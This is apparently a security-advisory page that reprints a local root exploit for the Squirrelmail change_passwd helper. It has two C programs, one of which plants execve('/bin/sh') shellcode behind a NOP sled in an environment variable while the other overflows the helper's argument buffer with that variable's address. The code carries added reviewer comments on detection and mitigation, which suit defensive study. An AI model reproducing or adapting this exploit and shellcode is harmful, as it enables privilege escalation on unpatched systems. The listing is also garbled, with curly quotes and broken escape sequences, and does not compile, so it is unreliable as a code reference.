Squirrelmail Change_passwd Buffer Overflow Exploit

Summary

As we reported in our previous article, Squirrelmail Change_passwd Buffer Overflow, a vulnerability in the product allows local attackers to gain elevated privileges by overflowing an internal buffer. The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:

The information has been provided by SpikE VrM.


Details

Exploit:
SPK-chpasswd.c:
/*
** Squirrelmail's chpasswd local root exploit bY SpikE <spike_vrm at mail.com>
** Bug found bY Matias Neiff <matias at neiff.com.ar>
**
** Usage: Execute setegg before running this exploit
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

#define BUFSIZE 200

char *Egg;        // value part of the spkEGG environment variable (installed by setegg)
int EggAddr;      // Egg's address squeezed into an int: only meaningful where pointers are 4 bytes
char *chpasswd;   // path of the target chpasswd binary, taken from argv[1]

/*
** Build the oversized first argument and exec the target chpasswd with it.
**
** Reads the globals chpasswd (path given on the command line) and
** EggAddr (address of the spkEGG environment string).  Buffer is
** BUFSIZE bytes: the loop stores EggAddr in every 4-byte slot below
** offset BUFSIZE-4, then a 4-byte zero fills the last slot so the
** argument is NUL-terminated.  The advisory above describes chpasswd
** copying this argument into a fixed-size internal buffer without a
** length check; the repeated pointer is presumably what lands on the
** saved return address in that binary (not visible from here).
**
** Reviewer notes (defensive reading):
**  - 32-bit only: EggAddr is an int and Buffer is walked in int-sized
**    slots, so the technique assumes pointers fit in 4 bytes.
**  - The string literals are mangled in transcription (curly quotes,
**    a bare `n` where a newline escape stood); the file does not
**    compile as shown.
**  - Detection: the privileged chpasswd helper being started with a
**    ~200-byte first argument consisting of one repeated 4-byte value,
**    from a process whose environment carries `spkEGG`, is the
**    observable signature of this tool.
**  - Mitigation: replace the vulnerable change_passwd helper; a stack
**    protector, non-executable stack and ASLR each break this
**    fixed-address, environment-resident payload technique.
*/
void doExploit()
{
 char Buffer[BUFSIZE];
 int *Ptr = (int *)Buffer;   // walk Buffer in 4-byte (int) slots
 int i;

 fprintf(stdout,'[+] Egg address: %#010xn’,EggAddr);

 // Fill every 4-byte slot below BUFSIZE-4 with the egg address
 for(i=0;i<BUFSIZE-4;i+=4)
  *Ptr++ = EggAddr;
 *Ptr = 0;   // 4-byte zero in the last slot: terminates the argument string

 // Replace this process with chpasswd; argv[1] is the oversized buffer
 execl(chpasswd,’chpasswd’,Buffer,’SPK’,’HACKED’,0);

 // execl only returns on failure, e.g. when the given path does not exist
 fprintf(stdout,'[-] %s not found!!!n’,chpasswd);
}

/*
** Entry point: takes the full path of the target chpasswd as argv[1],
** locates the payload that setegg placed in the environment, and hands
** off to doExploit().
**
** Returns 0 after doExploit() returns (which only happens when execl
** failed), exits 0 on a usage error and -1 when spkEGG is not set.
**
** Reviewer notes:
**  - getenv() returns a pointer to the value part of spkEGG, i.e. past
**    the "spkEGG=" name; that address is what EggAddr carries.
**  - When spkEGG is absent, getenv() returns NULL and `&Egg[0]` is
**    relied upon to produce 0; pointer arithmetic on a null pointer is
**    undefined behaviour in standard C, even though the check below
**    assumes it yields 0.
**  - The usage message on the spkEGG-missing path nests quotes inside
**    the literal, so even with straight quotes it would not compile as
**    written; the literals here are transcription artifacts.
*/
int main(int argc, char **argv)
{
 printf(‘==[ Squirremail’s chpasswd local root exploit bY SpikE <spike_vrm@mail.com> ]==nn’);
 if(argc != 2)
 {
  printf(‘Usage: %s <chpasswd-full-path>nn’,argv[0]);
  exit(0);
 }
 chpasswd = argv[1];
 // Locate the payload installed by setegg and keep its address as an int
        Egg = getenv(‘spkEGG’);
        EggAddr = (int)&Egg[0];

 // Zero here means getenv() found no spkEGG in this environment
 if(EggAddr == 0)
 {
  printf(‘[-] spkEGG not found. Run ‘setegg’ first.n’);
  exit(-1);
 }
 doExploit();

 return(0);
}

setegg.c:
/*
** EGG generator bY SpikE <spike_vrm@mail.com>
**
** Usage: Execute this file before running the exploit
**
*/

#include <stdio.h>
#include <stdlib.h>

#define EGGSIZE 300

/*
** Payload that setegg's main() copies into the environment: seven
** filler bytes (later overwritten by the "spkEGG=" name), a long run of
** 0x90 bytes, and a short stub that ends in the literal "/bin/sh".
** As transcribed the escape sequences are garbled (`x90` rather than a
** byte escape), so this is a plain ASCII string rather than the bytes
** the author intended, and the file does not build as shown.  From a
** defender's view, a long 0x90 run followed by "/bin/sh" inside an
** environment variable is the recognisable signature of this payload.
*/
char Shellcode[] =
        ‘AAAAAAAx90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’
        ‘x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’
        ‘x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’

        ‘xebx1dx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8d’
 ‘x4ex08x31xd2xcdx80xb0x01x31xdbxcdx80xe8xdexffxffxff/bin/sh’;

/*
** Entry point of setegg: builds the "spkEGG=<payload>" string in a
** stack buffer, publishes it with putenv(), and spawns a child bash
** that inherits it.  The exploit is meant to be run from that shell.
**
** Reviewer notes:
**  - putenv() keeps the pointer it is given rather than copying, so the
**    environment entry aliases EGG, a local of this frame.  It stays
**    valid only while main() is running, which is why a child shell is
**    started with system() instead of returning.
**  - The second memcpy() writes the 7-byte "spkEGG=" name over the
**    first 7 bytes of the copied Shellcode (the "AAAAAAA" filler),
**    turning the array into a NAME=value string.
**  - memset/memcpy/strlen are used without including <string.h>
**    (implicit declarations); u_long has no header here either.
**    EGGPtr and EGGAddr are declared but never used, and main() has no
**    return statement.
**  - Detection: a shell whose environment carries a `spkEGG` variable
**    with the payload described above is the persistent trace this
**    helper leaves.
**  - The trailing quote after the closing brace belongs to the page's
**    quoting of the listing, not to the program.
*/
int main()
{
 char EGG[EGGSIZE];
 char *EGGPtr;
 u_long EGGAddr;

 printf(‘[+] Creating EGGn’);

 // Zero-fill, copy the payload, then stamp the variable name over its filler bytes
 memset(EGG,0,EGGSIZE);
 memcpy(EGG,Shellcode,strlen(Shellcode));
 memcpy(EGG,’spkEGG=’,7);
 putenv(EGG);   // no copy is made: the environment now points into this stack frame

 // Child shell inherits the environment; must run before EGG goes out of scope
 system(‘/bin/bash’);
}’
